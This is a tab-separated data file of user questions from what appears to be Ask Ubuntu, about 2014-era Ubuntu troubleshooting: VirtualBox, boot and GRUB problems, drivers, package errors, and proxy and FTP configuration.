498895	virtualbox 4.3.10 clipboard share does n't work on ubuntu 14.04	environment : virtualbox 4.3.10 ubuntu 14:04 desktop host : win 7 4.3.10 addon and 4.3.10 extension are installed . but client ubuntu 14.04 ca n't not share clipboard between host win7 . because i ca n't answer my question with lower score . so i add solution in question . solution : install addon : vboxguestadditions_4.3.13-93885.iso . the issue is fixed .
498897	13.10 to 14.04 upgrade `` failed to fetch ... ''	when i tried to upgrade , the following msg appears and the upgradation stopes . please help . // failed to fetch http : //dk.archive.ubuntu.com/ubuntu/pool/universe/h/highlight.js/libjs-highlight_7.4+ds-1_all.deb 404 not found [ ip : xxx.xx.xxx.xx xx ] //
498900	vbox on 14.04 : kernel driver not installed ( rc=-1908 )	kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . this is a familiar message to everyone that uses virtual box . this `` bug '' has been popping up every few months at least since 11.10 . i got it today for the first time on 14.04 and unfortunately the classical solution of re-installing virtualbox-dkms is not having any effect : sudo apt-get install linux-headers-generic build-essential dkms sudo apt-get remove virtualbox-dkms sudo apt-get install virtualbox-dkms what could be the reason for this old fix to fail ? update : in the comments user bain makes reference to an old thread that apparently reports to the same problem . while the error message is similar , on ubuntu 14.04 this issue seems to have a different nature , unrelated to the virtualbox-dkms package . for instance , on ubuntu 14.04 the virtualbox package is up to date : $ sudo apt-cache policy virtualbox virtualbox : installed : 4.3.10-dfsg-1 candidate : 4.3.10-dfsg-1 version table : *** 4.3.10-dfsg-1 0 500 http : //de.archive.ubuntu.com/ubuntu/ trusty/multiverse amd64 packages 100 /var/lib/dpkg/status
498901	password restriction is not working	i have two administrator accounts `` magesh '' and `` test '' . i do n't want `` test '' user to change my password in the ui . i have restricted it in terminal by giving the following commands in /etc/sudoers % sudo all= ( all ) ! /usr/bin/passwd magesh it 's working in terminal . i ca n't able to change password of `` magesh '' account . but in ui it 's not working . any idea about it ?
498903	bios stuck on system start	when i press the power button to start my laptop stucks at black screen . to exit from this situation i have to wait about 10 sec to press ctrl + alt + del and then my laptop reach at the grub selection . moreover in ubuntu when the laptop wake up from sleep , it restart instead of waking up . my configuration i have dual boot on ubuntu 14.4 and windows 8 i am using hp elite-book 2530p ram 4gb ddr2 graphics - intel mobile graphics . what i tried to solve the problem . as i am techy guy , i was thinking its just a bios fault so i updated my bios from windows ( hp have bios which can only be installed from windows ) but with no luck , i have to still press ctrl + alt + del to start my system . i 'm searching any suggestion .
498904	why do i get internet connection without a defined interface ?	i have an ubuntu 14.04 virtual machine . i set the nat networking option to it . without any further changes , i can access to internet from my vm . when i run : cat /etc/network/interfaces i get this : ubuntu14 @ ubuntu14 : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback how come i get internet connection without any interface defined for my nat ?
498910	kvm guest performance impacted by very long virtblk disk wait times	i have several kvm guests running on ubuntu 14.04 using libvirt . their performance is very poor . the intermittent nature of the poor performance with an order of magnitude variability in simple benchmark tests and apparent influence of activity on other vms suggests strongly that the problem is contention for resources in the host . sar monitoring on the guests reveals a problem with virtblk disks having to wait a very large time for i/o requests to be serviced . e.g . 00:00:01 dev tps rd_sec/s wr_sec/s avgrq-sz avgqu-sz await svctm % util 00:05:01 dev253-0 0.10 0.00 1.39 14.34 0.00 682539.72 0.14 0.00 the await time is consistently extremely high and is similar across all guests . a typical disk configuration is < disk type='file ' device='disk ' > < driver name='qemu ' type='raw'/ > < source file='/var/lib/libvirt/images/base-dev-0002-clone.img'/ > < target dev='vda ' bus='virtio'/ > < address type='pci ' domain='0x0000 ' bus='0x00 ' slot='0x03 ' function='0x0'/ > < /disk > a number of things have been tried on the guests including cache settings and io=native in the driver line , cloning from raw img file storage to a logical volume , elevator=deadline , virtio_blk.use_bio=1 but without any significant impact . i understand that a virtual disk must take a performance hit but this is extreme . what is typical await time for a kvm guest ? bearing in mind my resource contention claim , what resources , ulimits etc might need to be allocated on the host ? the host has plenty of resources and shows no obvious signs of problems .
498912	tp-link wn723-n wi-fi	i have a problem with usb modem wn723-n . it works only if i plug in it again , otherwise it shows that i 'm disconnected . is it something connected to power of usb-port , but how then my mouse can work ? ) thanks in advance !
498913	how to install microsoft office 2013 on ubuntu 14.04 ?	my system is running on ubuntu 14.04 ( 64 bit ) and i have already installed wine-1.6.2 , and when i go and double click on setup.exe icon , i get the following setup error dialog : setup ca n't find or validate an installation file . please try reinstall office from your installation source , or if you install from a downloaded package , please re-install . if you continue to have problems , please contact microsoft or your system adminstrator . is there any way to install office 2013 ? thanks in advance .
498914	reload the list of bookmarks in files/nautilus	problem : i have some bookmarks in nautilus ( v3.8.2 ) that point to folders that are part of a truecrypt volume that i mount after logging into the system . the problem is that as this happens after logging in , nautilus during the session start can not find them and thus ignores them so they do n't appear in the left panel . workaround # 1 : i can open the nautilus ' bookmarks editor , rearrange the bookmarks back and forth and nautilus reloads their list in the left panel . however , it 's annoying to do it manually all the time . workaround # 2 : i can kill nautilus as suggested in another question and when i start it again , it shows all the bookmarks . unfortunately this requires opening nautilus because after killing it , all the desktop icons disappear . question : is there some other way i can force this reload ? something i could incorporate into a bash script and make it happen automatically few minutes after the session start . note : please , do n't suggest use of another file manager . i know that for example nemo does n't have this problem but this question is about finding solution for nautilus .
498918	404 not found - error while updating using aptitude	w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/raring-security/restricted/binary-i386/packages 404 not found [ ip : 91.189.88.153 80 ] w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/raring-security/universe/binary-i386/packages 404 not found [ ip : 91.189.88.153 80 ]
498922	sh : 2 : source : not found	i am having a problem with the installation of armitage in ubuntu 14.04 i have followed this link and everything is okey http : //www.darkoperator.com/installing-metasploit-in-ubunt/ but the last line would not pass : ( sudo sh -c `` echo export msf_database_config=/opt/metasploit-framework/database.yml > > /etc/profile source /etc/profile '' it says : sh : 2 : source : not found and that 's generate an error ( could not find database ) while launching armitage . please help me , thank you
498923	ubuntu 14.04 not showing existing partitions	i am having a problem while installing ubuntu with windows 7 ( both are 64 bit ) . my windows 7 is already installed , when i try to install ubuntu 14.04 , it is not showing my partitions , instead it is showing entire 1tb hd . i know this question is already asked here but when i tried sudo fixparts /dev/sda1 i am getting following output : i am not able to get what to do ahead . i am new to ubuntu , so can any one help me ?
498927	i have downloaded ubuntu 14.04 and burned it onto a disk , it 's an iso file.. will it boot from disk ?	i downloaded the .iso file from the ubuntu website , burned it to a [ dvd ] disc and before i wipe windows ( i do n't have a spare windows disc ) i want to know will it boot from the disk ?
498932	triple boot ubuntu 14.04 lts	i 've already installed windows 7 dual boot on different hdd both are windows 7 so if i choose alongside option then ubuntu grub will let choose all preinstalled two os ?
498934	could not find gem 'jquery-rails ( > = 0 ) '	i was trying to create a rails application . it created it successfully and at the end it says ; resolving dependencies ... could not find gem 'jquery-rails ( > = 0 ) ruby ' in the gems available on this machine . pls help me out
498938	virtualbox - vm can`t open usb	i have installed windows 8 on virtual machine . at first it could not recognize any usb i tried the solution in how to set up usb for virtualbox ? and now the system can understand that i connected a removable disk . now there is another problem as you can see below : what should i do ? i also installed virtualbox extension pack . one more thing , windows ca n't recognize either my webcam even if it recognizes the bluetooth devices .
498943	openssl : bad magic number	i want to decrypt a file , i run : openssl enc -d -aes128 -in encrypted.txt -out decrypted.txt it asked me this : enter aes-128-cbc decryption password : whatever i type , i get this : bad magic number i did not find an answer on this forum when i checked similar question . please help me .
498947	how do you install ubuntu for android on a samsung galaxy s5 ?	i was looking into installing ubuntu on my samsung s5 can this be done ? if yes how ?
498950	possible to `` electronically disconnect '' the fingerprint sensor on my laptop ? // x41 thinkpad	i 'd like to fully disable the fingerprint sensor on my ibm x41 thinkpad . the first place to look which comes to mind is bios ( version 2.09 , 74et64ww ) : i just checked again : as far as i can tell there is no bios option to fully disable the fingerprint sensor : only to set fingerprint passwords etc , but not an option to `` electronically disconnect '' / pull-the-plug of the sensor itself . could there be some command line option to do just that ? the reason i 'm asking : the sensor surface does get quite hot which is annoying ( and a waste of energy , too ) . ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 002 : id 0483:2016 sgs thomson microelectronics fingerprint reader ~ $ usb-devices t : bus=01 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=480 mxch= 8 d : ver= 2.00 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0002 rev=03.02 s : manufacturer=linux 3.2.0-67-generic ehci_hcd s : product=ehci host controller s : serialnumber=0000:00:1d.7 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=02 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch= 2 d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0001 rev=03.02 s : manufacturer=linux 3.2.0-67-generic uhci_hcd s : product=uhci host controller s : serialnumber=0000:00:1d.0 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=03 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch= 2 d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0001 rev=03.02 s : manufacturer=linux 3.2.0-67-generic uhci_hcd s : product=uhci host controller s : serialnumber=0000:00:1d.1 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=04 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch= 2 d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0001 rev=03.02 s : manufacturer=linux 3.2.0-67-generic uhci_hcd s : product=uhci host controller s : serialnumber=0000:00:1d.2 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub t : bus=04 lev=01 prnt=01 port=01 cnt=01 dev # = 2 spd=12 mxch= 0 d : ver= 1.00 cls=00 ( > ifc ) sub=00 prot=00 mxps= 8 # cfgs= 1 p : vendor=0483 prodid=2016 rev=00.01 s : manufacturer=stmicroelectronics s : product=biometric coprocessor c : # ifs= 1 cfg # = 1 atr=a0 mxpwr=100ma i : if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=00 prot=00 driver= ( none ) t : bus=05 lev=00 prnt=00 port=00 cnt=00 dev # = 1 spd=12 mxch= 2 d : ver= 1.10 cls=09 ( hub ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1d6b prodid=0001 rev=03.02 s : manufacturer=linux 3.2.0-67-generic uhci_hcd s : product=uhci host controller s : serialnumber=0000:00:1d.3 c : # ifs= 1 cfg # = 1 atr=e0 mxpwr=0ma i : if # = 0 alt= 0 # eps= 1 cls=09 ( hub ) sub=00 prot=00 driver=hub edit ( @ tim 's comment ) ~ $ xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ tpps/2 ibm trackpoint id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ thinkpad extra buttons id=13 [ slave keyboard ( 3 ) ]
498958	realtek rtl8187b stopped working	i have ubuntu 13.10 server running 3.11 kernel i had rtl8187b working out of the box but after installing atheros driver ( for another adapter ) my realtek stopped working , i used backports to install the atheros driver i looked at /lib/modules/ and the module was n't recently modified but when i try modprobe rtl8187 i get error : could not insert 'rtl8187 ' : invalid argument this is the output of dmesg | tail [ 3097.162711 ] rtl8187 : disagrees about version of symbol wiphy_rfkill_start_polling [ 3097.162716 ] rtl8187 : unknown symbol wiphy_rfkill_start_polling ( err -22 ) [ 3097.162739 ] rtl8187 : disagrees about version of symbol ieee80211_unregister_hw [ 3097.162744 ] rtl8187 : unknown symbol ieee80211_unregister_hw ( err -22 ) [ 3097.162757 ] rtl8187 : disagrees about version of symbol ieee80211_beacon_get_tim [ 3097.162761 ] rtl8187 : unknown symbol ieee80211_beacon_get_tim ( err -22 ) [ 3097.162800 ] rtl8187 : disagrees about version of symbol ieee80211_rx_irqsafe [ 3097.162805 ] rtl8187 : unknown symbol ieee80211_rx_irqsafe ( err -22 ) [ 3097.162828 ] rtl8187 : disagrees about version of symbol ieee80211_rts_duration [ 3097.162833 ] rtl8187 : unknown symbol ieee80211_rts_duration ( err -22 ) any suggestions ?
498961	important installations failed	i have a new computer with ubuntu 12.04 lts ready installed . i get a message telling me to install an important security update 'linux kernel image for version 3.5.0 on 64bit x86 smp , but install fails . then , even worse , having tried again i get a message telling me . 'your current hardware enablement stack ( hwe ) is going out of support on 07/08/14 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available . it sounds dire . please help in language that a newbie ( aged 70+ ) can understand .
498963	ubuntu uvcvideo integrated camera disconnects	i have acer v3-771g laptop with ubuntu 14.04 lts installed and i have the following issue with the integrated webcam ( it 's uvcvideo ) : when i 'm trying to enable camera via skype/google+/cheese i see it 's being enabled & disables quickly so i 'm not able to use it . i 've tried to reinstall uvcvideo module via : sudo modprobe -r uvcvideo sudo modprobe -v uvcvideo but it does n't help . here 's my dmesg result : http : //pastebin.com/anjbnnyz if anyone got any idea how to fix it , please help . br
498964	clean install of ubuntu 14.04 onto ssd fails to boot . single os	i 've been trying to install ubuntu 14.04 onto my laptop . i removed the windows 8.1 drive and put in a brand new ssd and installed mint 14 ( petra ) first . it would n't boot . i decided to have a crack at ubuntu 14.04 and told it to delete the mint installation and it also would n't boot . i 've reinstalled the thing so many times and tried different things but am a newbie to linux and do n't really know what to do . so , i 've reinstalled ubuntu again , then ran boot-repair which gave me this link as a reference . http : //paste.ubuntu.com/7807920/ is anyone able to give me a nudge or two in the direction that can leave me with a working linux on my laptop . i 'd hate to have to drag the windows 8.1 disk back out and shove it in . thanks in advance .
498965	win7 /ubuntu 14.04 on 1 drive ; win xp on 1 drive -- boots into xp	i 'm so close to finally having ubuntu up and running . the first time , i let boot-repair do its thing automatically http : //paste.ubuntu.com/7804480/ then could n't boot into anything . i had a fiddle with it and this is what i have : http : //paste.ubuntu.com/7804855 3 drives : win xp on 1 ( c : ) win7 and ubuntu 14.04 on 1 ( g : /h : ) data on 1 ( f : ) i 've put each one first in the boot sequence . c : xp boots ok. g : /h : gives the error 'no such partition ' . f : no such device ( followed by a long alphanumeric string : c190ef54-81 ... ) i 'm close , i can feel it ! : ) thanks for any help . [ update ] after a few more failed attempts -plus my xp system disc refusing to help me out by restoring the mbr- i think the best thing is to put ubuntu on its own drive ( cheers from the crowd ! ) and win7 can move in with xp . i 'd put 7 on its own but i do n't see a way to power a fourth drive without replacing my aging motherboard .
498968	ctrl-alt-t stopped working - ubuntu 14.04	this happens now and then and after a restart it works . no clue as to what causes this . when this happened earlier i would search for terminal in dash and launch . but today , even that does not work . i have tried the solutions posted in the following posts without any luck . ctrl+alt+t not working ctrl alt t does n't work i am going to restart lightdm first to see if that helps and if not i will restart my laptop . i look forward to your suggestions on what else i could try for this is sure to recur .
498971	netflix-desktop app no longer exists in 14.04	after a fresh install of 14.04 i can not get the netflix-desktop app . i type in the proper code and i get `` e : unable to locate package netflix-desktop '' . is it no longer available ? thank you .
498972	nautilus does not show the files	i can cd to a directory . that directory is not empty and also does not include any hidden files . i see them by ls command . but when i go to that directory via nautilus , it does not show anything ?
498973	which time server is used by ubuntu	what is the url of the timer server used by ubuntu ? the settings page just shows the radio option `` automatically from internet '' , but it does not show the actual server url , like in windows .
498977	squidguard blocking problems	below is my squid 3.3 and squidguard 1.5 confg files , running in ubuntu 14.04 64bit server . i am having problems with squidguard , if i am to put anymore than 3 blocks of blacklists , it stops working all together even though the db update works just fine . i have also tried to group all my blacklists into my block which also did n't work , can anyone help me figure out why , it wo n't except any more than 3 blocks in squidguard . squidguard also stop working from time to time squidguard.conf dbhome /var/lib/squidguard/db logdir /var/log/squidguard dest ads { domainlist ads/domains urllist ads/urls expressionlist ads/expressions } dest porn { domainlist porn/domains urllist porn/urls expressionlist porn/expressions } dest white { domainlist whitelist/domains urllist whitelist/urls } acl { default { pass white ! ads ! porn all redirect 302 : http : //xx.xx.xx.xx/transparent.png # redirect http : //xxx.xxx.xxx.xx/cgi-bin/blocked.cgi ? clientaddr= % a $ } } squid.conf http_port 3129 http_port 3128 transparent refresh_pattern ^ftp : 1440 20 % 10080 refresh_pattern ^gopher : 1440 0 % 1440 refresh_pattern -i ( /cgi-bin/|\ ? ) 0 0 % 0 refresh_pattern . 0 20 % 4320 acl localnet src 10.0.0.0/8 # rfc 1918 possible internal network acl localnet src 172.16.0.0/12 # rfc 1918 possible internal network acl localnet src 192.168.0.0/16 # rfc 1918 possible internal network acl localnet src xx.xx.xx.xx # home acl localnet src fc00 : :/7 # rfc 4193 local private network range acl localnet src fe80 : :/10 # rfc 4291 link-local ( directly plugged ) machines acl ssl_ports port 443 # https acl safe_ports port 80 # http acl safe_ports port 21 # ftp acl safe_ports port 443 # https acl safe_ports port 70 # gopher acl safe_ports port 210 # wais acl safe_ports port 1025-65535 # unregistered ports acl safe_ports port 280 # http-mgmt acl safe_ports port 488 # gss-http acl safe_ports port 591 # filemaker acl safe_ports port 777 # multiling http acl connect method connect http_access deny ! safe_ports http_access deny connect ! ssl_ports http_access allow localhost manager http_access deny manager http_access allow localnet http_access allow localhost http_access deny all url_rewrite_access allow all url_rewrite_program /usr/bin/squidguard -c /etc/squidguard/squidguard.conf url_rewrite_children 5 # anonymizing via off forwarded_for off request_header_access allow allow all request_header_access authorization allow all request_header_access www-authenticate allow all request_header_access proxy-authorization allow all request_header_access proxy-authenticate allow all request_header_access cache-control allow all request_header_access content-encoding allow all request_header_access content-length allow all request_header_access content-type allow all request_header_access date allow all request_header_access expires allow all request_header_access host allow all request_header_access if-modified-since allow all request_header_access last-modified allow all request_header_access location allow all request_header_access pragma allow all request_header_access accept allow all request_header_access accept-charset allow all request_header_access accept-encoding allow all request_header_access accept-language allow all request_header_access content-language allow all request_header_access mime-version allow all request_header_access retry-after allow all request_header_access title allow all request_header_access connection allow all request_header_access proxy-connection allow all request_header_access user-agent allow all request_header_access cookie allow all request_header_access all deny all # default : dns_v4_first on # cache # cache_mem 1024 mb # cache_dir ufs /var/spool/squid3 10000 16 256 access_log stdio : /var/log/squid3/access.log # cache_log /var/log/cache/cache.log # dns options # ========== # dns_timeout 10 seconds dns_nameservers 8.8.8.8 8.8.4.4 # options for tuning the cache # ======================== # refresh_pattern ^ftp : 1440 20 % 10080 reload-into-ims # refresh_pattern ^gopher : 1440 0 % 1440 # refresh_pattern -i \. ( gif|png|jp ? g|ico|bmp|tiff ? ) $ 10080 95 % 43200 override-exp $ # refresh_pattern -i \ . ( rpm|cab|deb|exe|msi|msu|zip|tar|xz|bz|bz2|lzma|gz|tgz|rar $ # refresh_pattern -i \ . ( avi|iso|wav|mid|mp ? |mpeg|mov|3gp|wm ? |swf|flv|x-flv|axd ) $ $ # refresh_pattern -i \ . ( html|htm|css|js ) $ 1440 75 % 40320 # refresh_pattern -i \.index . ( html|htm ) $ 0 75 % 10080 # refresh_pattern -i ( /cgi-bin/|\ ? ) 0 0 % 0 # refresh_pattern . 1440 90 % 10080 # administrative parameters # ===================== cache_mgr xxxxx @ xxx cache_effective_user proxy cache_effective_group proxy httpd_suppress_version_string on visible_hostname
498981	vmware : windows server 2012 machine gets stuck	i installed windows server 2012 on a vmware vm in order to create a sharepoint 2013 sandbox environment . the system worked fine and at maximum speed until i installed the standalone version of sharepoint 2013 . after that , the whole system got extremely unperformant and nearly impossible to use anymore because it gets stuck every few seconds . this also effects the performance of my host system ( ubuntu 14.04 , 8gb ram , intel i5-2520m ) . i tried to add more ram to the vm ( currently 4096 mb ) and i gave it 2 of my 4 cpu cores but nothing helped ... the system monitors of both ubuntu and windows do n't show full cpu load and there 's 31 % ( of 8gb ) ram occupied on ubuntu and 60 % ( of 4gb ) on windows , so normally there should n't be a problem . what can i try to solve this ? thank you in advance !
498982	create ftp users with limited access only to home directory ubuntu 12.04	i 'm having ubuntu 12.04 server and i have installed vsftpd service for ftp . i 'm trying to create a ftp user who has access only to /var/www/ directory and all permissions for sub-directories . ftpuser should not have access to any root / top level directories and files . so far i have done following things . i have created user called ftpuser1 i have changed the home directory for ftpuser1 to /var/www/ i have edited /etc/vsftpd.conf file and have set chroot_local_user=yes restarted vsftpd service after doing all these , my ftpuser1 still able to access top level directories and files . please let me know , how i can block top level access ?
498983	can you use the same bootable usb for multiple installations	i 'm trying to install ubuntu on two laptops , but is it safe to use the same bootable usb for both , or should i burn the iso again ? my worry is if it saves configuration files or removes some files from usb during installation .
498986	ubuntu server 14.04 installing	how to install ubuntu server 14.04 64 bit on my physical machine without internet connection , is it possible ?
498987	installing ubuntu server on a sony vaio with no hardware-virtualization	is there a version of ubuntu server that can be installed on a laptop ( sony vaio ) with the hardware-virtualization disabled ? it is not possible to enable hardware-virtualization in some vaio laptops . hve tried everything , but sony has disabled this from most of their laptops . i tried to install ubuntu server v 14 but came back with an error related to the fact that the hardware-virtualization was not enabled . any ideas ? thanks very much
498990	bash : install_path : no such file or directory	when i open a new terminal i get : bash : install_path : no such file or directory my .bashrc file conatins the following code : # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi source /opt/ros/hydro/setup.bash source ~/catkin_ws/devel/setup.bash export ld_library_path= < install_path > /local/lib : /home/enova6/catkin_ws/devel/lib : /opt/ros/hydro/lib export path= < install_path > /local/bin : /home/enova6/catkin_ws/devel/bin : /opt/ros/hydro/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games export pkg_config_path= < install_path > /local/lib/pkgconfig : /home/enova6/catkin_ws/devel/lib/pkgconfig : /opt/ros/hydro/lib/pkgconfig source ~/catkin_ws/devel/setup.bash source /opt/ros/hydro/setup.bash why do i have this problem and how can i fix it ? ?
498991	can you remove the flash drive after installing ubuntu using a flash drive ?	i know that you install ubuntu using a flash drive so do u have keep in your computer to run linux .
498992	grub2 on lvm : how can i switch between alternate root lvs ?	i have a working setup of ubuntu server 12.04 lts ( precise ) installed on a lvm volume ( /dev/vg0/root ) . /boot is on the same lv , and grub2 boots nicely from it using its own raid/lvm/xfs modules . great thing ! now i would like to test ubuntu server 14.04 lts ( trusty ) to evaluate if the more recent packages improve things in my setting . so what i do is simply create another lv , say /dev/vg0/root-trusty , and prepare it just the way i normally do when i do bare metal setups using debootstrap and chroot , installing kernel , grub-pc , etc . now i have two full-fledged root filesystems on my lvm , including two /boot directories and two differing /boot/grub/grub.cfg files . please help me think : how does grub know now which grub.cfg to use ? the only way that would make sense to me is that grub-install saves information about what the systemfrom which grub-install is run thinks is the correct root-fs . so switching between the two root-lvs for boot could be done by issuing grub-install from the respective ( chrooted ) filesystem and then reboot . is that so ? if not , what else does grub2 do when it `` finds '' multiple filesystems it could use to stage-2-boot from ? i could not seem to find any hard information about that so far . so i thought i 'd just ask before i invest the late evening hours in trial-and-error . thanks for any light shed on this ! ps : for clarity - i do not mean typical dual-booting using multiple os entries in a single grub.cfg on a separate /boot partition . i know that , but here i sort of want to use concurrent grub2-installations on separate partitions .
498997	ubuntu 14.04 to kubuntu 14.04	i 'm new here , so please excuse me if this question has been asked before . also , i 'm new to this whole linux/ubuntu etc thing , so this may be a silly question . : - ) i installed ubuntu 14.04 on my acer aspire 5349 a few days ago . it now dual boots with win 7 . i find that it 's very good and i quite like the gui , but a wee bit 'jerky ' on graphics rich facebook games ( using chrome ) . my question is regarding changing to kubuntu instead . i think that i prefer the look of that , and is it possible to replace u with k ? i 'd rather not 'trio-boot ' . i 'm not a complete techie , so please be gentle with me ( ! )
499001	libopenal.so missing	i am trying to play openspades here , it gives me this error . failed to dlload libopenal.so is missing in /home/user/openspades/openspades.mk/bin//libopenal.so . can not open shared file : no such file or directory . i checked if it could be installed by apt-cache search and was called libopenal1 . and it is installed already . i tried the linking solution but seems like there 's no such file with the name libopenal . * in the whole /usr/lib/ file
499004	compiling ssr ( simplescreenrecorder )	i am really stuck at compiling ssr downloaded from here . ran the script simple-build-and-install . mkdir : can not create directory 'build ' : permission denied any idea how to fix this ?
499005	updated software : now , nvidia module wo n't load	graphics card : nvidia fx 5200 uname -a : ' [ ... ] 3.13.0-30-generic # 55~precise1-ubuntu smp fri jul 4 21:56:07 utc 2014 i686 i686 i386 gnu/linux yesterday ( previous kernel version ) , my update manager popped up to advise of a slew of updates ( including one to do with my hardware ) available to perform . i accepted them and rebooted . however , after said boot-up , i found i was no longer able to start a graphical session , not even run x . it turned out that the updated nvidia graphics card module could not be loaded . dmesg returned this : nvidia : unknown symbol acpi_os_wait_events_complete ( err 0 ) . by googling i found a page about this issue with a solution that the section of source code in nv_acpi.c ( it turns out the file on my system is called nvacpi.c ) outputting this error be commented out . now , i backed-up the existing nvacpi.c and got editing , the nvidia 'readme ' on my system advising to do a make , make install . but when i rebooted i got the same error . i ended up commenting out any sections of source code in various related files that had anything to do with acpi , getting more fundamental errors as a result . finally , having failed to fix anything , i purged my system of the nvidia driver and x , the system automatically reverting to the nouveau driver , and then re-installed x . although most things are working now , this is not really satisfactory as i ca n't use blender or google earth . have i missed a step in re-compiling and installing re the 'nvacpi.c ' source file ? there was another nvidia help file which mentioned 'diff ' and some other commands .
499008	kubuntu launcher menu without categories	i dont know if its right to ask about kubuntu , but i hope not : ) i 'm trying kubuntu 14.04 and i just found one disadvantage for me that 's the way how the launcher looks . it contains categories , in which are apps . is there any way to show just list of apps installed , like in windows or ubuntu ? i ca n't find anything ! edit : i 've tried and i found only way to switch classic ( like start in win98 ) with categories and normal launcher ( kubuntu ) also with categories . then there 's way to add app icon to panel , but i dont want to have all apps on panel . in kde menu editor when i remove categories and move apps out of it , on save it still shows the same . only thing i can do `` is sort icons by '' edit2 : i 've installed lancelot widget , which is a bit better than original launcher . of course i would appreciate if someone can tell me about launcher , that do n't use categories , only list of apps : ) reason : i 'm angry if i must be looking for konsole ( terminal ) more than three minutes , becouse i 've to see all apps in every category ( system , settings , utilities )
499011	gzserver error while loading shared libraries	i installed gaebo 1.9 under ubuntu 12.04 , but it did not work with ros hudro , so i uninstalled it . now i am trying to reinstall it following these instructions . when i enter the command sudo apt-get install gazebo i get : 0 upgraded , 0 newly installed , 0 to remove and 581 not upgraded . when i try to launch gzserver i get : gzserver : error while loading shared libraries : libsdformat.so.1 : can not open shared object file : no such file or directory .
499014	getting connection with openxenmanager	i am having problems connecting to my server with openxenmanager on my ubuntu laptop . i keep getting connection refused .
499016	opera developer gets wrong ( red ) icon when launched from terminal	i have opera developer installed in ubuntu 14.04 when i start opera-developer from the dash it starts and has a blue icon in the application but when start opera from the terminal ( for example with some extra cli switches ) it gets the red icon of the old opera presto , which is confusing . also when i start opera developer from the launcher submenu with a right click new private window it gives me the red icon . how can i fix that ?
499017	buggy screenshot file name	i using ubuntu 14.04 with turkish language . my problem is screenshot file-naming . when i press prtsc , screenshot 's file name buggy . file name is supposed to be like this : ekran görüntüsü 2014-07-17 15:11:40.png that 's what happens : 2014-07-17 15:11:40.png ekran görüntüsü what is the solution for this bug ? thanks
499019	ubuntu hardware requirements nd best version	pc processor intel celeron d ram 780 mb had disk 500gb updated sata lg cd/dvd writer i do n't know software programming can install a cd , so make it simple . please do help i do n't want to put away a pc which works well thank you
499020	access to different directories	i have recently moved to ubuntu 12.04 and noticed that in some directories i ca n't even create a directory or file ( e.g : /var/lib ) . i know about the command chmod , but is it appropriate to use it in order to modify the access to these sort of directories ? for example i wanted to install something from the command line but gave me an error because it did n't have access and i thought that for security reasons i should n't change it .
